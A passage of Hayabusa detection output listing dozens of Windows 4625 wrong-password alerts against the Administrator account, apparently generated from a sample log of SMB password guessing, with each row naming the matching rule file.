01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:28.814 